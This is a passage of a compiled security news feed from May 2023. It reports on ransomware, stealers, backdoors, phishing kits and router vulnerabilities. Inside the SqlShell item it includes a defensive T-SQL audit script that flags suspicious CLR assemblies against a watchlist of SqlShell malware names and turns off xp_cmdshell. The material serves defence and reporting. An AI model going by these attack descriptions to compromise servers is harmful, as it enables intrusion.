"If one node in the chain is compromised or taken down, the attacker can still maintain communication with the C2 by routing traffic through a different node in the chain," the researchers explained.

That said, this is not the first time China-affiliated threat actors have relied on a network of compromised routers to meet their strategic objectives.

In 2021, the National Cybersecurity Agency of France (ANSSI) detailed an intrusion set orchestrated by APT31 (aka Judgement Panda or Violet Typhoon) that leveraged a piece of advanced malware known as Pakdoor (or SoWat) to allow the infected routers to communicate with each other.

"The discovery is yet another example of a long-standing trend of Chinese threat actors to exploit internet-facing network devices and modify their underlying software or firmware," the researchers said.


Inside Qilin Ransomware: Affiliates Take Home 85% of Ransom Payouts
16.5.23  Ransomware  The Hacker News

Ransomware affiliates associated with the Qilin ransomware-as-a-service (RaaS) scheme earn between 80% and 85% of the ransom payments, according to new findings from Group-IB.

The cybersecurity firm said it was able to infiltrate the group in March 2023, uncovering details about the affiliates' payment structure and the inner workings of the RaaS program following a private conversation with a Qilin recruiter who goes by the online alias Haise.

"Many Qilin ransomware attacks are customized for each victim to maximize their impact," the Singapore-headquartered company said in a new report. "To do this, the threat actors can leverage such tactics as changing the filename extensions of encrypted files and terminating specific processes and services."

Qilin, also known as Agenda, was first documented by Trend Micro in August 2022, starting off as a Go-based ransomware before switching to Rust in December 2022.


The adoption of Rust is significant not only because of its detection-evasion capabilities, but also because it allows the threat actors to target Windows, Linux, and VMware ESXi servers.

Attacks mounted by the group make use of phishing emails containing malicious links as a means to obtain initial access and encrypt sensitive data, but not before exfiltrating it as part of a double extortion model.

Data from as many as 12 different companies has been posted on Qilin's data leak portal on the dark web between July 2022 and May 2023.

The victims, which mainly span critical infrastructure, education, and healthcare sectors, are located in Australia, Brazil, Canada, Colombia, France, Japan, Netherlands, Serbia, the U.K., and the U.S.

Group-IB said the Qilin actors also provide affiliates – who are recruited to identify targets of interest and stage the attacks – with an administrative panel to effectively oversee various parts of their operations.

"Qilin ransomware group has an affiliate panel divided into sections such as Targets, Blogs, Stuffers, News, Payments, and FAQs to manage and coordinate its network of affiliates," security researcher Nikolay Kichatov said.

Targets - A section to configure ransom notes, files, directories, and extensions to be skipped, extensions to be encrypted, processes to be terminated, and the mode of encryption, among others
Blogs - A section for affiliates to create blog posts with information about attacked companies that have not paid the ransom
Stuffers - A section for the threat actors to create accounts for other members of the team and manage their privileges
News - A section to post updates related to their ransomware partnerships (currently blank)
Payments - A section that contains transaction details, affiliate wallet balances, and options to withdraw illicit proceeds
FAQs - A section featuring support and documentation information that details the steps to use the ransomware

"Although Qilin ransomware gained notoriety for targeting critical sector companies, they are a threat to organizations across all verticals," Kichatov said.

"Moreover, the ransomware operator's affiliate program is not only adding new members to its network, but it is weaponizing them with upgraded tools, techniques, and even service delivery."


CopperStealer Malware Crew Resurfaces with New Rootkit and Phishing Kit Modules
16.5.23  Virus  The Hacker News
The threat actors behind the CopperStealer malware resurfaced with two new campaigns in March and April 2023 that are designed to deliver two novel payloads dubbed CopperStealth and CopperPhish.

Trend Micro is tracking the financially motivated group under the name Water Orthrus. The adversary is also assessed to be behind another campaign known as Scranos, which was detailed by Bitdefender in 2019.

Active since at least 2021, Water Orthrus has a track record of leveraging pay-per-install (PPI) networks to redirect victims landing on cracked software download sites to drop an information stealer codenamed CopperStealer.

Another campaign spotted in August 2022 entailed the use of CopperStealer to distribute Chromium-based web browser extensions that are capable of performing unauthorized transactions and transferring cryptocurrency from victims' wallets to ones under attackers' control.

The latest attack sequences documented by Trend Micro don't mark much of a deviation, propagating CopperStealth by packaging it as installers for free tools on Chinese software-sharing websites.

"CopperStealth's infection chain involves dropping and loading a rootkit, which later injects its payload into explorer.exe and another system process," security researchers Jaromir Horejsi and Joseph C Chen said in a technical report.

"These payloads are responsible for downloading and running additional tasks. The rootkit also blocks access to blocklisted registry keys and prevents certain executables and drivers from running."

The driver denylist contains byte sequences pertaining to Chinese security software companies like Huorong, Kingsoft, and Qihoo 360.

CopperStealth also incorporates a task module that enables it to call out to a remote server and retrieve the command to be executed on the infected machine, equipping the malware to drop more payloads.

File Sharing Websites Act as Conduit for CopperPhish Phishing Kit
The CopperPhish campaign, detected worldwide in April 2023, takes advantage of an analogous process to deploy the malware via PPI networks behind free anonymous file-sharing websites.

"Visitors will be redirected to a download page designed by the PPI network after clicking on its advertisements, which pretended to be a download link," the researchers said. "The downloaded file is PrivateLoader, which downloads and runs many different malware."

The downloader service, which is also offered on a PPI basis, is then used to retrieve and launch CopperPhish, a phishing kit that's responsible for harvesting credit card information.

It achieves this by "starting a rundll32 process and injecting a simple program with a browser window (written in Visual Basic) in it," which loads a phishing page urging victims to scan a QR code in order to verify their identity and enter a confirmation code to "restore your device's network."

"The window has no controls that can be used to minimize or close it," the researchers explained. "The victim could close the browser's process in Task Manager or Process Explorer, but they would also need to terminate the main payload process, otherwise the browser process will happen again due to the persistence thread."

Once the sensitive details are entered in the page, the CopperPhish malware displays the message "the identity verification has passed" alongside a confirmation code that the victim can enter on the aforementioned screen.

Providing the correct confirmation code also causes the malware to uninstall itself and delete all the dropped phishing files from the machine.

"The credential verification and confirmation code are two useful features that make this phishing kit more successful, as the victim cannot simply close the window or enter fake information just to get rid of the window," the researchers said.

The attribution to Water Orthrus is based on the fact that both CopperStealth and CopperPhish share similar source code characteristics with CopperStealer, raising the possibility that all three strains may have been developed by the same author.

The disparate objectives of the campaigns represent the evolution of the threat actor's tactics, indicating an attempt to add new capabilities to its arsenal and expand its financial horizons.

The findings come as malicious Google ads are being used to entice users into downloading fake installers for AI tools like Midjourney and OpenAI's ChatGPT that ultimately drop stealers such as Vidar and RedLine.

They also follow the discovery of a new traffic-monetizing service called TrafficStealer that leverages misconfigured containers to redirect traffic to websites and generate fake ad clicks as part of an illicit money-making scheme.


Hackers Using Golang Variant of Cobalt Strike to Target Apple macOS Systems
16.5.23  Apple  The Hacker News
A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems.

The findings come from SentinelOne, which observed an uptick in the number of Geacon payloads appearing on VirusTotal in recent months.

"While some of these are likely red-team operations, others bear the characteristics of genuine malicious attacks," security researchers Phil Stokes and Dinesh Devadoss said in a report.

Cobalt Strike is a well-known red teaming and adversary simulation tool developed by Fortra. Owing to its myriad post-exploitation capabilities, illegally cracked versions of the software have been abused by threat actors over the years.

While post-exploitation activity associated with Cobalt Strike has primarily singled out Windows, such attacks against macOS are something of a rarity.

In May 2022, software supply chain firm Sonatype disclosed details of a rogue Python package called "pymafka" that was designed to drop a Cobalt Strike Beacon onto compromised Windows, macOS, and Linux hosts.

That may, however, change with the emergence of Geacon artifacts in the wild. Geacon is a Go variant of Cobalt Strike that has been available on GitHub since February 2020.

Further analysis of two new VirusTotal samples that were uploaded in April 2023 has traced their origins to two Geacon variants (geacon_plus and geacon_pro) that were developed in late October by two anonymous Chinese developers z3ratu1 and H4de5.

The geacon_pro project is no longer accessible on GitHub, but an Internet Archive snapshot captured on March 6, 2023, reveals its ability to bypass antivirus engines such as Microsoft Defender, Kaspersky, and Qihoo 360 360 Core Crystal.

H4de5, the developer behind geacon_pro, claims the tool is mainly designed to support CobaltStrike versions 4.1 and later, while geacon_plus supports CobaltStrike version 4.0. The current version of the software is 4.8.

Xu Yiqing's Resume_20230320.app, one of the artifacts discovered by SentinelOne, employs a run-only AppleScript to reach out to a remote server and download a Geacon payload. It's compatible with both Apple silicon and Intel architectures.

"The unsigned Geacon payload is retrieved from an IP address in China," the researchers said. "Before it begins its beaconing activity, the user is presented with a two-page decoy document embedded in the Geacon binary. A PDF is opened displaying a resume for an individual named 'Xu Yiqing.'"

The Geacon binary, compiled from the geacon_plus source code, packs a multitude of functions that allow it to download next-stage payloads, exfiltrate data, and facilitate network communications.

The second sample, per the cybersecurity firm, is embedded within a trojanized app that masquerades as the SecureLink remote support app (SecureLink.app) and mainly targets Intel devices.

The barebones, unsigned application requests for users' permission to access contacts, photos, reminders, as well as the device's camera and microphone. Its main component is a Geacon payload built from the geacon_pro project that connects to a known command-and-control (C2) server in Japan.

The development comes as the macOS ecosystem is being targeted by a wide variety of threat actors, including state-sponsored groups, to deploy backdoors and information stealers.

"The uptick in Geacon samples over the last few months suggests that security teams should be paying attention to this tool and ensuring that they have protections in place," the researchers said.


CLR SqlShell Malware Targets MS SQL Servers for Crypto Mining and Ransomware
15.5.23  Virus  The Hacker News
Poorly managed Microsoft SQL (MS SQL) servers are the target of a new campaign that's designed to propagate a category of malware called CLR SqlShell that ultimately facilitates the deployment of cryptocurrency miners and ransomware.

"Similar to web shell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior," AhnLab Security Emergency Response Center (ASEC) said in a report published last week.

A stored procedure is a subroutine that contains a set of Structured Query Language (SQL) statements for use across multiple programs in a relational database management system (RDBMS).

CLR (short for common language runtime) stored procedures – available in SQL Server 2005 and later – refer to stored procedures that are written in a .NET language such as C# or Visual Basic.

The attack method discovered by the South Korean cybersecurity firm entails the use of CLR stored procedures to install the malware on MS SQL servers using the xp_cmdshell command, which spawns a Windows command shell and passes an instruction as input for execution.

Some of the techniques employed by threat actors, including those associated with LemonDuck, MyKings (aka DarkCloud or Smominru), and Vollgar, concern the exploitation of internet-exposed MS SQL servers via brute-force and dictionary attacks to run xp_cmdshell commands and OLE stored procedures and execute malware.

The use of CLR stored procedures is the latest addition to this list, with attackers taking advantage of SqlShell routines to download next-stage payloads such as Metasploit and cryptocurrency miners like MrbMiner, MyKings, and LoveMiner.

What's more, SqlShells named SqlHelper, CLRSQL, and CLR_module have been used by different adversaries to escalate privileges on compromised servers, launch ransomware and proxyware, and carry out reconnaissance in targeted networks.

"SqlShell can install additional malware such as backdoors, coin miners, and proxyware, or it can execute malicious commands received from threat actors in a way similar to WebShell," ASEC said.
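As an added defender-side example (not from the ASEC report and not code from any of the tools it names), the following T-SQL inventories the server settings and user-defined CLR assemblies that this technique depends on, so that an unexpected assembly or a re-enabled xp_cmdshell stands out. The temporary inventory table, the 30-day "recently created" window, and the SqlShell names used as a watchlist are assumptions; the catalog views are standard SQL Server objects.

```sql
-- Audit script for the CLR SqlShell technique described above (added example).
-- Run as sysadmin. HASHBYTES over varbinary(max) needs SQL Server 2016 or later.

-- 1. Server-level switches. All four default to 0 on a fresh install; a SqlShell
--    needs 'clr enabled' = 1 and typically re-enables xp_cmdshell as well.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('clr enabled', 'xp_cmdshell',
               'Ole Automation Procedures', 'clr strict security');

-- 2. Inventory every user-defined assembly in every online database, with its
--    permission set, a SHA-256 of the loaded bytes (compare against a known-good
--    list), and the CLR procedures/functions/triggers that map onto it.
IF OBJECT_ID('tempdb..#clr_inventory') IS NOT NULL DROP TABLE #clr_inventory;
CREATE TABLE #clr_inventory (
    database_name  sysname,
    assembly_name  sysname,
    permission_set nvarchar(60),
    create_date    datetime,
    modify_date    datetime,
    sha256         varbinary(32),
    clr_objects    nvarchar(max)   -- e.g. "CLR_STORED_PROCEDURE [dbo].[Exec]"
);

DECLARE @db sysname, @sql nvarchar(max);
DECLARE db_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.databases WHERE state_desc = 'ONLINE';
OPEN db_cur;
FETCH NEXT FROM db_cur INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- USE inside the dynamic batch switches context for the rest of that batch.
    SET @sql = N'USE ' + QUOTENAME(@db) + N';
        INSERT INTO #clr_inventory
        SELECT DB_NAME(), a.name, a.permission_set_desc, a.create_date, a.modify_date,
               HASHBYTES(''SHA2_256'', f.content),
               STUFF((SELECT '', '' + o.type_desc + '' ''
                             + QUOTENAME(SCHEMA_NAME(o.schema_id)) + ''.'' + QUOTENAME(o.name)
                      FROM sys.assembly_modules m
                      JOIN sys.objects o ON o.object_id = m.object_id
                      WHERE m.assembly_id = a.assembly_id
                      FOR XML PATH('''')), 1, 2, '''')
        FROM sys.assemblies a
        JOIN sys.assembly_files f ON f.assembly_id = a.assembly_id AND f.file_id = 1
        WHERE a.is_user_defined = 1;';
    EXEC sp_executesql @sql;
    FETCH NEXT FROM db_cur INTO @db;
END
CLOSE db_cur; DEALLOCATE db_cur;

-- 3. Flag what deserves a look: anything above SAFE (UNSAFE assemblies may call
--    arbitrary Win32 APIs, which is what a shell needs), names matching the
--    SqlShell families quoted in the article, or assemblies created in the last
--    30 days (assumed review window).
SELECT *
FROM #clr_inventory
WHERE permission_set <> 'SAFE_ACCESS'
   OR assembly_name IN ('SqlHelper', 'CLRSQL', 'CLR_module')
   OR create_date > DATEADD(day, -30, SYSDATETIME())
ORDER BY create_date DESC;

-- 4. Brute-force / dictionary activity against exposed instances: failed logins
--    are written to the SQL error log under the default audit level.
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed';

-- 5. Remediation for the most abused switch, once nothing legitimate needs it.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
```

Dropping a flagged assembly (DROP ASSEMBLY) only works after its dependent CLR procedures are dropped, and the `sha256` column is what lets you tell a vendor-supplied assembly from a re-uploaded copy with the same name.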


Former Ubiquiti Employee Gets 6 Years in Jail for $2 Million Crypto Extortion Case
15.5.23  Crime  The Hacker News
A former employee of Ubiquiti has been sentenced to six years in jail after he pleaded guilty to posing as an anonymous hacker and a whistleblower in an attempt to extort almost $2 million worth of cryptocurrency while working at the company.

Nickolas Sharp, 37, was arrested in December 2021 for using his insider access as a senior developer to steal confidential data and sending an anonymous email asking the network technology provider to pay 50 bitcoin (about $2 million at the time) in exchange for the siphoned information.

Ubiquiti, however, didn't yield to the ransom attempt and instead looped in law enforcement, which eventually identified Sharp as the hacker after tracing a VPN connection to a Surfshark account purchased with his PayPal account.

"Sharp repeatedly misused his administrative access to download gigabytes of confidential data from his employer," the U.S. Justice Department said, adding he "modified session file names to attempt to make it appear as if other coworkers were responsible for his malicious sessions."

The Oregon-based defendant, besides giving false statements denying any knowledge of the extortion scheme, tampered with log retention policies and other files in order to conceal his unauthorized activity on the company's network.

Sharp, who was employed at Ubiquiti from August 2018 through late March 2021, pleaded guilty earlier this February to falsely spreading the news that the company had been hacked by an unidentified perpetrator who had acquired administrator access to the firm's AWS accounts.

The fabricated security breach led to Ubiquiti's stock price sliding approximately 20% in March 2021, causing it to lose over $4 billion in market capitalization.

Ubiquiti formally disclosed the "incident" in January 2021, describing it as a case of "unauthorized access to certain of our information technology systems hosted by a third-party cloud provider." It further urged users to change their passwords and enable two-factor authentication.

In addition to the prison term, Sharp has been "sentenced to three years of supervised release and ordered to pay restitution of $1,590,487 and to forfeit personal property used or intended to be used in connection with these offenses."


Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks
15.5.23  IoT  The Hacker News
Several security vulnerabilities have been disclosed in cloud management platforms associated with three industrial cellular router vendors that could expose operational technology (OT) networks to external attacks.

The findings were presented by Israeli industrial cybersecurity firm OTORIO at the Black Hat Asia 2023 conference last week.

The 11 vulnerabilities allow "remote code execution and full control over hundreds of thousands of devices and OT networks - in some cases, even those not actively configured to use the cloud."

Specifically, the shortcomings reside in the cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks to remotely manage and operate devices.

Successful exploitation of the vulnerabilities could pose severe risks to industrial environments, allowing adversaries to sidestep security layers as well as exfiltrate sensitive information and achieve code execution remotely on the internal networks.

Even worse, the issues could be weaponized to obtain unauthorized access to devices in the network and perform malicious operations such as shutdown with elevated permissions.

This, in turn, is made possible by three different attack vectors that could be exploited to compromise and take over cloud-managed IIoT devices through their cloud-based management platforms:

Weak asset registration mechanisms (Sierra Wireless): An attacker could scan for unregistered devices that are connected to the cloud, get their serial numbers by taking advantage of the AirVantage online Warranty Checker tool, register them to an account under their control, and execute arbitrary commands.
Flaws in security configurations (InHand Networks): An unauthorized user could leverage CVE-2023-22601, CVE-2023-22600, and CVE-2023-22598, a command injection flaw, to gain remote code execution with root privileges, issue reboot commands, and push firmware updates.
External API and interfaces (Teltonika Networks): A threat actor could abuse multiple issues identified in the remote management system (RMS) to "expose sensitive device information and device credentials, enable remote code execution, expose connected devices managed on the network, and allow impersonation of legitimate devices."

The six flaws impacting Teltonika Networks – CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587, and CVE-2023-2588 – were discovered following a "comprehensive research" carried out in collaboration with Claroty.

"An attacker successfully exploiting these industrial routers and IoT devices can cause a number of impacts on compromised devices and networks, including monitoring network traffic and stealing sensitive data, hijacking internet connections and accessing internal services," the companies said.

OTORIO said cloud-managed devices pose a "huge" supply-chain risk and that a single vendor compromise can act as a backdoor for accessing several OT networks in one sweep.

The development comes a little more than three months after the cybersecurity company disclosed 38 security flaws in the wireless industrial Internet of Things (IIoT) devices that could provide attackers a direct path to internal OT networks and put critical infrastructure at risk.

"As the deployment of IIoT devices becomes more popular, it's important to be aware that their cloud management platforms may be targeted by threat actors," security researcher Roni Gavrilov said. "A single IIoT vendor platform being exploited could act as a 'pivot point' for attackers, accessing thousands of environments at once."


New Ransomware Gang RA Group Hits U.S. and South Korean Organizations
15.5.23  Ransomware  The Hacker News
A new ransomware group known as RA Group has become the latest threat actor to leverage the leaked Babuk ransomware source code to spawn its own locker variant.

The cybercriminal gang, which is said to have been operating since at least April 22, 2023, is rapidly expanding its operations, according to cybersecurity firm Cisco Talos.

"To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals," security researcher Chetan Raghuprasad said in a report shared with The Hacker News.

RA Group is no different from other ransomware gangs in that it launches double extortion attacks and runs a data leak site to apply additional pressure on victims to pay ransoms.

The Windows-based binary employs intermittent encryption to speed up the process and evade detection, not to mention deleting volume shadow copies and the contents of the machine's Recycle Bin.

"RA Group uses customized ransom notes, including the victim's name and a unique link to download the exfiltration proofs," Raghuprasad explained. "If the victim fails to contact the actors within three days, the group leaks the victim's files."

It also takes steps to avoid encrypting system files and folders by means of a hard-coded list, so that the victims can still download the qTox chat application and reach out to the operators using the qTox ID provided in the ransom note.

What sets RA Group apart from other ransomware operations is that the threat actor has also been observed selling the victim's exfiltrated data on its leak portal by hosting the information on a secured TOR site.

The development comes less than a week after SentinelOne disclosed that threat actors of varying sophistication and expertise are increasingly adopting the Babuk ransomware code to develop a dozen variants that are capable of targeting Linux systems.

"There is a noticeable trend that actors increasingly use the Babuk builder to develop ESXi and Linux ransomware," the cybersecurity firm said. "This is particularly evident when used by actors with fewer resources, as these actors are less likely to significantly modify the Babuk source code."

Other ransomware actors that have adopted the Babuk source code over the past year include AstraLocker and Nokoyawa. Cheerscrypt, another ransomware strain based on Babuk, has been linked to a Chinese espionage actor called Emperor Dragonfly that's known for operating short-lived ransomware schemes such as Rook, Night Sky, and Pandora.

The findings also follow the discovery of two other new ransomware strains codenamed Rancoz and BlackSuit, the latter of which is designed to target both Windows and VMware ESXi servers.

"The constant evolution and release of new ransomware variants highlight the advanced skills and agility of [threat actors], indicating that they are responding to cybersecurity measures and checks being implemented and customizing their ransomware accordingly," Cyble said.


Researchers Uncover Powerful Backdoor and Custom Implant in Year-Long Cyber Campaign
15.5.23  Virus  The Hacker News
Government, aviation, education, and telecom sectors located in South and Southeast Asia have come under the radar of a new hacking group as part of a highly-targeted campaign that commenced in mid-2022 and continued into the first quarter of 2023.

Symantec, by Broadcom Software, is tracking the activity under its insect-themed moniker Lancefly, with the attacks making use of a "powerful" backdoor called Merdoor.

Evidence gathered so far points to the custom implant being utilized as far back as 2018. The ultimate goal of the campaign, based on the tools and the victimology pattern, is assessed to be intelligence gathering.

"The backdoor is used very selectively, appearing on just a handful of networks and a small number of machines over the years, with its use appearing to be highly targeted," Symantec said in an analysis shared with The Hacker News.

"The attackers in this campaign also have access to an updated version of the ZXShell rootkit."

While the exact initial intrusion vector used is currently not clear, it's suspected to have involved the use of phishing lures, SSH brute-forcing, or the exploitation of internet-exposed servers.

The attack chains ultimately lead to the deployment of ZXShell and Merdoor, a fully-featured malware that can communicate with an actor-controlled server for further commands and log keystrokes.

ZXShell, first documented by Cisco in October 2014, is a rootkit that comes with various features to harvest sensitive data from infected hosts. The use of ZXShell has been linked to various Chinese actors like APT17 (Aurora Panda) and APT27 (aka Budworm or Emissary Panda) in the past.

"The source code of this rootkit is publicly available so it may be used by multiple different groups," Symantec said. "The new version of the rootkit used by Lancefly appears to be smaller in size, while it also has additional functions and targets additional antivirus software to disable."

Another Chinese link comes from the fact that the ZXShell rootkit is signed by the certificate "Wemade Entertainment Co. Ltd," which was previously reported by Mandiant in August 2019 to be associated with APT41 (aka Winnti).

Lancefly's intrusions have also been identified as employing PlugX and its successor ShadowPad, the latter of which is a modular malware platform privately shared among multiple Chinese state-sponsored actors since 2015.

That said, it's also known that certificate and tool sharing is prevalent among Chinese state-sponsored groups, making attribution to a specific known attack crew difficult.

"While the Merdoor backdoor appears to have been in existence for several years, it appears to only have been used in a small number of attacks in that time period," Symantec noted. "This prudent use of the tool may indicate a desire by Lancefly to keep its activity under the radar."


New 'MichaelKors' Ransomware-as-a-Service Targeting Linux and VMware ESXi Systems
15.5.23  Ransomware  The Hacker News
A new ransomware-as-a-service (RaaS) operation called MichaelKors has become the latest file-encrypting malware to target Linux and VMware ESXi systems as of April 2023.

The development points to cybercriminal actors increasingly setting their eyes on the ESXi, cybersecurity firm CrowdStrike said in a report shared with The Hacker News.

"This trend is especially noteworthy given the fact that ESXi, by design, does not support third-party agents or AV software," the company said.

"In fact, VMware goes as far as to claim it's not required. This, combined with the popularity of ESXi as a widespread and popular virtualization and management system, makes the hypervisor a highly attractive target for modern adversaries."

The targeting of VMware ESXi hypervisors with ransomware to scale such campaigns is a technique known as hypervisor jackpotting. Over the years, the approach has been adopted by several ransomware groups, including Royal.

What's more, an analysis from SentinelOne last week revealed that 10 different ransomware families, including Conti and REvil, have utilized the Babuk source code leaked in September 2021 to develop lockers for VMware ESXi hypervisors.

Other notable e-crime outfits that have updated their arsenal to target ESXi consist of ALPHV (BlackCat), Black Basta, Defray, ESXiArgs, LockBit, Nevada, Play, Rook, and Rorschach.

Part of the reason why VMware ESXi hypervisors are becoming an attractive target is that the software runs directly on a physical server, granting a potential attacker the ability to run malicious ELF binaries and gain unfettered access over the machine's underlying resources.

Attackers looking to breach ESXi hypervisors can do so by using compromised credentials, followed by gaining elevated privileges and either laterally moving through the network or escaping the confines of the environment via known flaws to advance their motives.

VMware, in a knowledge base article last updated in September 2020, notes that "antivirus software is not required with the vSphere Hypervisor and the use of such software is not supported."

"More and more threat actors are recognizing that the lack of security tools, lack of adequate network segmentation of ESXi interfaces, and [in-the-wild] vulnerabilities for ESXi creates a target rich environment," CrowdStrike said.

Ransomware actors are far from the only outfits to strike virtual infrastructure. In March 2023, Google-owned Mandiant attributed to a Chinese nation-state group the use of novel backdoors dubbed VIRTUALPITA and VIRTUALPIE in attacks aimed at VMware ESXi servers.

To mitigate the impact of hypervisor jackpotting, organizations are recommended to avoid direct access to ESXi hosts, enable two-factor authentication, take periodic backups of ESXi datastore volumes, apply security updates, and conduct security posture reviews.

"Adversaries will likely continue to target VMware-based virtualization infrastructure," CrowdStrike said. "This poses a major concern as more organizations continue transferring workloads and infrastructure into cloud environments – all through VMWare Hypervisor environments."


New Phishing-as-a-Service Platform Lets Cybercriminals Generate Convincing Phishing Pages
13.5.23  Phishing  The Hacker News
A new phishing-as-a-service (PhaaS or PaaS) platform named Greatness has been leveraged by cybercriminals to target business users of the Microsoft 365 cloud service since at least mid-2022, effectively lowering the bar to entry for phishing attacks.

"Greatness, for now, is only focused on Microsoft 365 phishing pages, providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages," Cisco Talos researcher Tiago Pereira said.

"It contains features such as having the victim's email address pre-filled and displaying their appropriate company logo and background image, extracted from the target organization's real Microsoft 365 login page."

Campaigns involving Greatness have mainly targeted manufacturing, health care, and technology entities located in the U.S., the U.K., Australia, South Africa, and Canada, with a spike in activity detected in December 2022 and March 2023.

Phishing kits like Greatness offer threat actors, rookies or otherwise, a cost-effective and scalable one-stop shop, making it possible to design convincing login pages associated with various online services and bypass two-factor authentication (2FA) protections.

Specifically, the authentic-looking decoy pages function as a reverse proxy to harvest credentials and time-based one-time passwords (TOTPs) entered by the victims.

Attack chains begin with malicious emails containing an HTML attachment, which, upon opening, executes obfuscated JavaScript code that redirects the user to a landing page with the recipient's email address pre-filled and prompts for their password and MFA code.

The entered credentials and tokens are subsequently forwarded to the affiliate's Telegram channel for obtaining unauthorized access to the accounts in question.

The adversary-in-the-middle (AiTM) phishing kit also comes with an administration panel that enables the affiliate to configure the Telegram bot, keep track of stolen information, and even build booby-trapped attachments or links.

What's more, each affiliate is expected to have a valid API key in order to be able to load the phishing page. The API key also prevents unwanted IP addresses from viewing the phishing page and facilitates behind-the-scenes communication with the actual Microsoft 365 login page by posing as the victim.

"Working together, the phishing kit and the API perform a 'man-in-the-middle' attack, requesting information from the victim that the API will then submit to the legitimate login page in real time," Pereira said.

"This allows the PaaS affiliate to steal usernames and passwords, along with the authenticated session cookies if the victim uses MFA."

The findings come as Microsoft has begun enforcing number matching in Microsoft Authenticator push notifications as of May 8, 2023, to improve 2FA protections and fend off prompt bombing attacks.


XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks
13.5.23  Virus  The Hacker News
Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems.

Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany.

"The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis shared with The Hacker News.

The report builds on recent findings from Elastic Security Labs, which revealed the threat actor's reservation-themed lures to deceive victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads.

The attacks begin with phishing attacks to distribute decoy Microsoft Word documents that, instead of using macros, weaponize the Follina vulnerability (CVE-2022-30190, CVSS score: 7.8) to drop an obfuscated PowerShell script.

From there, the threat actors abuse the PowerShell script to bypass Antimalware Scan Interface (AMSI), disable Microsoft Defender, establish persistence, and ultimately launch the .NET binary containing XWorm.

Interestingly, one of the variables in the PowerShell script is named "$CHOTAbheem," which is likely a reference to Chhota Bheem, an Indian animated comedy adventure television series.

"Based on a quick check, it appears that the individual or group responsible for the attack could have a Middle Eastern/Indian background, although the final attribution has not yet been confirmed," the researchers told The Hacker News, pointing out that such keywords could also be used as a cover.

XWorm is a commodity malware that's advertised for sale on underground forums and comes with a wide range of features that allow it to siphon sensitive information from infected hosts.

The malware is also a Swiss Army knife in that it can perform clipper, DDoS, and ransomware operations, spread via USB, and drop additional malware.

The exact origins of the threat actor are currently unclear, although Securonix said the attack methodology shares artifacts similar to that of TA558, which has been observed striking the hospitality industry in the past.

"Though phishing emails rarely use Microsoft Office documents since Microsoft made the decision to disable macros by default, today we're seeing proof that it is still important to be vigilant about malicious document files, especially in this case where there was no VBscript execution from macros," the researchers said.


Netgear Routers' Flaws Expose Users to Malware, Remote Attacks, and Surveillance
13.5.23  Vulnerability  The Hacker News
As many as five security flaws have been disclosed in Netgear RAX30 routers that could be chained to bypass authentication and achieve remote code execution.

"Successful exploits could allow attackers to monitor users' internet activity, hijack internet connections, and redirect traffic to malicious websites or inject malware into network traffic," Claroty security researcher Uri Katz said in a report.

Additionally, a network-adjacent threat actor could also weaponize the flaws to access and control networked smart devices like security cameras, thermostats, and smart locks; tamper with router settings; and even use a compromised network to launch attacks against other devices or networks.

The list of flaws, which were demonstrated at the Pwn2Own hacking competition held in Toronto in December 2022, is as follows -

CVE-2023-27357 (CVSS score: 6.5) - Missing Authentication Information Disclosure Vulnerability
CVE-2023-27368 (CVSS score: 8.8) - Stack-based Buffer Overflow Authentication Bypass Vulnerability
CVE-2023-27369 (CVSS score: 8.8) - Stack-based Buffer Overflow Authentication Bypass Vulnerability
CVE-2023-27370 (CVSS score: 5.7) - Device Configuration Cleartext Storage Information Disclosure Vulnerability
CVE-2023-27367 (CVSS score: 8.0) - Command Injection Remote Code Execution Vulnerability
A proof-of-concept (PoC) exploit chain illustrated by the industrial cybersecurity firm shows that it's possible to string the flaws -- CVE-2023-27357, CVE-2023-27369, CVE-2023-27368, CVE-2023-27370, and CVE-2023-27367 (in that order) -- to extract the device serial number and ultimately obtain root access to it.

"These five CVEs can be chained together to compromise affected RAX30 routers, the most severe of which enable pre-authentication remote code execution on the device," Katz noted.

Users of Netgear RAX30 routers are advised to update to firmware version 1.0.10.94 released by the networking company on April 7, 2023, to address the flaws and mitigate potential risks.


New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows
13.5.23  Virus  The Hacker News
A previously undocumented and mostly undetected variant of a Linux backdoor called BPFDoor has been spotted in the wild, cybersecurity firm Deep Instinct said in a technical report published this week.

"BPFDoor retains its reputation as an extremely stealthy and difficult-to-detect malware with this latest iteration," security researchers Shaul Vilkomir-Preisman and Eliran Nissan said.

BPFDoor (aka JustForFun), first documented by PwC and Elastic Security Labs in May 2022, is a passive Linux backdoor associated with a Chinese threat actor called Red Menshen (aka DecisiveArchitect or Red Dev 18), which is known to single out telecom providers across the Middle East and Asia since at least 2021.

The malware is specifically geared towards establishing persistent remote access to compromised target environments for extended periods of time, with evidence pointing to the hacking crew operating the backdoor undetected for years.

BPFDoor gets its name from its use of Berkeley Packet Filters (BPF), a technology that makes it possible to analyze and filter network traffic on Linux systems, for network communications and for processing incoming commands.

In doing so, threat actors can penetrate a victim's system and execute arbitrary code without being detected by firewalls, while simultaneously filtering out unnecessary data.

